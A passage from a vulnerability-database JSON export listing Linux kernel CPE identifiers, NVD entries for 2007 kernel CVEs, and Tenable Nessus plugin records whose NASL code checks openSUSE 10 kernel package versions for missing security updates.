"cpe:2.3:o:linux:linux_kernel:2.6.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16_rc7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11_rc1_bk6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.8:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:26:06", "description": "Stack-based buffer overflow in the random number generator (RNG) implementation in the Linux kernel before 2.6.22 might allow local root users to cause a denial of service or gain privileges by setting the default wakeup threshold to a value greater than the output pool size, which triggers writing random numbers to the stack by the pool transfer function involving \"bound check ordering\". NOTE: this issue might only cross privilege boundaries in environments that have granular assignment of privileges for root.", "edition": 5, "cvss3": {}, "published": "2007-07-27T21:30:00", "title": "CVE-2007-3105", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3105"], "modified": "2017-10-11T01:32:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.22"], "id": "CVE-2007-3105", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3105", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.22:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:26:05", "description": "Memory leak in the PPP over Ethernet (PPPoE) socket implementation in the Linux kernel before 2.6.21-git8 allows local users to cause a denial of service (memory consumption) by creating a socket using connect, and releasing it before the PPPIOCGCHAN ioctl is initialized.", "edition": 5, "cvss3": {}, "published": "2007-05-08T23:19:00", "title": "CVE-2007-2525", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2525"], "modified": "2017-10-11T01:32:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.21"], "id": "CVE-2007-2525", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2525", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.21:git7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:26:07", "description": "Linux kernel 2.4.35 and other versions allows local users to send arbitrary signals to a child process that is running at higher privileges by causing a setuid-root parent process to die, which delivers an attacker-controlled parent process death signal (PR_SET_PDEATHSIG).", "edition": 5, "cvss3": {}, "published": "2007-08-14T17:17:00", "title": "CVE-2007-3848", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3848"], "modified": "2018-10-15T21:31:00", "cpe": ["cpe:/o:linux:linux_kernel:2.4.35"], "id": "CVE-2007-3848", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3848", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.4.35:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-17T14:45:27", "description": "This kernel update fixes the following security problems :\n\n - CVE-2007-3105: Stack-based buffer overflow in the random\n number generator (RNG) implementation in the Linux\n kernel before 2.6.22 might allow local root users to\n cause a denial of service or gain privileges by setting\n the default wake-up threshold to a value greater than\n the output pool size, which triggers writing random\n numbers to the stack by the pool transfer function\n involving 'bound check ordering'. Since this value can\n only be changed by a root user, exploitability is low.\n\n - CVE-2007-2525: A memory leak in the PPPoE driver can be\n abused by local users to cause a denial-of-service\n condition.\n\n - CVE-2007-3851: On machines with a Intel i965 based\n graphics card local users with access to the direct\n rendering devicenode could overwrite memory on the\n machine and so gain root privileges.\n\n - CVE-2007-4573: It was possible for local user to become\n root by exploitable a bug in the IA32 system call\n emulation. This affects x86_64 platforms with kernel\n 2.4.x and 2.6.x before 2.6.22.7 only.\n\n - CVE-2007-4571: An information disclosure vulnerability\n in the ALSA driver can be exploited by local users to\n read sensitive data from the kernel memory.\n\nand the following non security bugs :\n\n - patches.arch/x86-fam10-mtrr: mtrr: fix size_or_mask\n and size_and_mask [#237736]\n\n - patches.fixes/usb_nokia6233_fix1.patch: usb:\n rndis_host: fix crash while probing a Nokia S60 mobile\n [#244459]\n\n - patches.fixes/usb_nokia6233_fix2.patch: usbnet: init\n fault (oops) cleanup, whitespace fixes [#244459]\n\n - patches.fixes/usb_nokia6233_fix2.patch: usb:\n unusual_devs.h entry for Nokia 6233 [#244459]\n\n - patches.fixes/bt_broadcom_reset.diff: quirky Broadcom\n device [#257303]\n\n - patches.arch/i386-compat-vdso: i386: allow debuggers\n to access the vsyscall page with compat vDSO [#258433]\n\n - -\n patches.fixes/anycast6-unbalanced-inet6_dev-refcnt.patch\n : Fix netdevice reference leak when reading from\n /proc/net/anycast6 [#285336]\n\n - -\n patches.drivers/scsi-throttle-SG_DXFER_TO_FROM_DEV-warni\n ng-b etter: SCSI: throttle SG_DXFER_TO_FROM_DEV warning\n message better [#290117]\n\n - -\n patches.fixes/nf_conntrack_h323-out-of-bounds-index.diff\n : nf_conntrack_h323: add checking of out-of-range on\n choices' index values [#290611]\n\n - patches.fixes/ppc-fpu-corruption-fix.diff: ppc: fix\n corruption of fpu [#290622]\n\n - -\n patches.fixes/ppp-fix-osize-too-small-errors-when-decodi\n ng-m ppe.diff: ppp: Fix osize too small errors when\n decoding mppe [#291102]\n\n - patches.fixes/hugetlbfs-stack-grows-fix.patch: Don't\n allow the stack to grow into hugetlb reserved regions\n [#294021]\n\n - patches.fixes/pwc_dos.patch: fix a disconnect method\n waiting for user space to close a file. A malicious\n user can stall khubd indefinitely long [#302063]\n [#302194]\n\n - patches.suse/kdb.add-unwind-info-to-kdb_call: Add\n unwind info to kdb_call() to fix build of KDB kernel\n on i386 [#305209]\n\n - Updated config files: enable KDB for kernel-debug on\n i386. [#305209]", "edition": 26, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : kernel (kernel-4487)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-4571", "CVE-2007-2525"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-bigsmp", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:kernel-xenpae", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-kdump"], "id": "SUSE_KERNEL-4487.NASL", "href": "https://www.tenable.com/plugins/nessus/27298", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-4487.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27298);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2525\", \"CVE-2007-3105\", \"CVE-2007-3851\", \"CVE-2007-4571\", \"CVE-2007-4573\");\n\n script_name(english:\"openSUSE 10 Security Update : kernel (kernel-4487)\");\n script_summary(english:\"Check for the kernel-4487 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update fixes the following security problems :\n\n - CVE-2007-3105: Stack-based buffer overflow in the random\n number generator (RNG) implementation in the Linux\n kernel before 2.6.22 might allow local root users to\n cause a denial of service or gain privileges by setting\n the default wake-up threshold to a value greater than\n the output pool size, which triggers writing random\n numbers to the stack by the pool transfer function\n involving 'bound check ordering'. Since this value can\n only be changed by a root user, exploitability is low.\n\n - CVE-2007-2525: A memory leak in the PPPoE driver can be\n abused by local users to cause a denial-of-service\n condition.\n\n - CVE-2007-3851: On machines with a Intel i965 based\n graphics card local users with access to the direct\n rendering devicenode could overwrite memory on the\n machine and so gain root privileges.\n\n - CVE-2007-4573: It was possible for local user to become\n root by exploitable a bug in the IA32 system call\n emulation. This affects x86_64 platforms with kernel\n 2.4.x and 2.6.x before 2.6.22.7 only.\n\n - CVE-2007-4571: An information disclosure vulnerability\n in the ALSA driver can be exploited by local users to\n read sensitive data from the kernel memory.\n\nand the following non security bugs :\n\n - patches.arch/x86-fam10-mtrr: mtrr: fix size_or_mask\n and size_and_mask [#237736]\n\n - patches.fixes/usb_nokia6233_fix1.patch: usb:\n rndis_host: fix crash while probing a Nokia S60 mobile\n [#244459]\n\n - patches.fixes/usb_nokia6233_fix2.patch: usbnet: init\n fault (oops) cleanup, whitespace fixes [#244459]\n\n - patches.fixes/usb_nokia6233_fix2.patch: usb:\n unusual_devs.h entry for Nokia 6233 [#244459]\n\n - patches.fixes/bt_broadcom_reset.diff: quirky Broadcom\n device [#257303]\n\n - patches.arch/i386-compat-vdso: i386: allow debuggers\n to access the vsyscall page with compat vDSO [#258433]\n\n - -\n patches.fixes/anycast6-unbalanced-inet6_dev-refcnt.patch\n : Fix netdevice reference leak when reading from\n /proc/net/anycast6 [#285336]\n\n - -\n patches.drivers/scsi-throttle-SG_DXFER_TO_FROM_DEV-warni\n ng-b etter: SCSI: throttle SG_DXFER_TO_FROM_DEV warning\n message better [#290117]\n\n - -\n patches.fixes/nf_conntrack_h323-out-of-bounds-index.diff\n : nf_conntrack_h323: add checking of out-of-range on\n choices' index values [#290611]\n\n - patches.fixes/ppc-fpu-corruption-fix.diff: ppc: fix\n corruption of fpu [#290622]\n\n - -\n patches.fixes/ppp-fix-osize-too-small-errors-when-decodi\n ng-m ppe.diff: ppp: Fix osize too small errors when\n decoding mppe [#291102]\n\n - patches.fixes/hugetlbfs-stack-grows-fix.patch: Don't\n allow the stack to grow into hugetlb reserved regions\n [#294021]\n\n - patches.fixes/pwc_dos.patch: fix a disconnect method\n waiting for user space to close a file. A malicious\n user can stall khubd indefinitely long [#302063]\n [#302194]\n\n - patches.suse/kdb.add-unwind-info-to-kdb_call: Add\n unwind info to kdb_call() to fix build of KDB kernel\n on i386 [#305209]\n\n - Updated config files: enable KDB for kernel-debug on\n i386. [#305209]\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-bigsmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xenpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kernel-bigsmp-2.6.18.8-0.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kernel-default-2.6.18.8-0.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kernel-kdump-2.6.18.8-0.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kernel-source-2.6.18.8-0.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kernel-syms-2.6.18.8-0.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kernel-xen-2.6.18.8-0.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"kernel-xenpae-2.6.18.8-0.7\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-bigsmp / kernel-default / kernel-kdump / kernel-source / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:27", "description": "This kernel update fixes the following security problems :\n\n - CVE-2007-4573: It was possible for local user to become\n root by exploiting a bug in the IA32 system call\n emulation. This affects x86_64 platforms with kernel\n 2.4.x and 2.6.x before 2.6.22.7 only.\n\n - CVE-2007-4571: An information disclosure vulnerability\n in the ALSA driver can be exploited by local users to\n read sensitive data from the kernel memory.\n\nFurthermore, this kernel catches up to the SLE 10 state of the kernel,\nwith numerous additional fixes.", "edition": 24, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : kernel (kernel-4473)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-4571"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-bigsmp", "p-cpe:/a:novell:opensuse:udev", "p-cpe:/a:novell:opensuse:kernel-um", "p-cpe:/a:novell:opensuse:kernel-xenpae", "p-cpe:/a:novell:opensuse:mkinitrd", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kexec-tools", "p-cpe:/a:novell:opensuse:open-iscsi", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-smp", "p-cpe:/a:novell:opensuse:kernel-default", "cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:multipath-tools", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-kdump"], "id": "SUSE_KERNEL-4473.NASL", "href": "https://www.tenable.com/plugins/nessus/27297", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-4473.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27297);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4573\");\n\n script_name(english:\"openSUSE 10 Security Update : kernel (kernel-4473)\");\n script_summary(english:\"Check for the kernel-4473 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update fixes the following security problems :\n\n - CVE-2007-4573: It was possible for local user to become\n root by exploiting a bug in the IA32 system call\n emulation. This affects x86_64 platforms with kernel\n 2.4.x and 2.6.x before 2.6.22.7 only.\n\n - CVE-2007-4571: An information disclosure vulnerability\n in the ALSA driver can be exploited by local users to\n read sensitive data from the kernel memory.\n\nFurthermore, this kernel catches up to the SLE 10 state of the kernel,\nwith numerous additional fixes.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-bigsmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-um\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xenpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kexec-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mkinitrd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:multipath-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:open-iscsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:udev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-bigsmp-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-debug-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-default-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-kdump-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-smp-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-source-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-syms-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-um-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-xen-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kernel-xenpae-2.6.16.53-0.16\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"kexec-tools-1.101-32.42\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"mkinitrd-1.2-106.59\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"multipath-tools-0.4.6-25.22\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"open-iscsi-2.0.707-0.27\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"udev-085-30.40\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 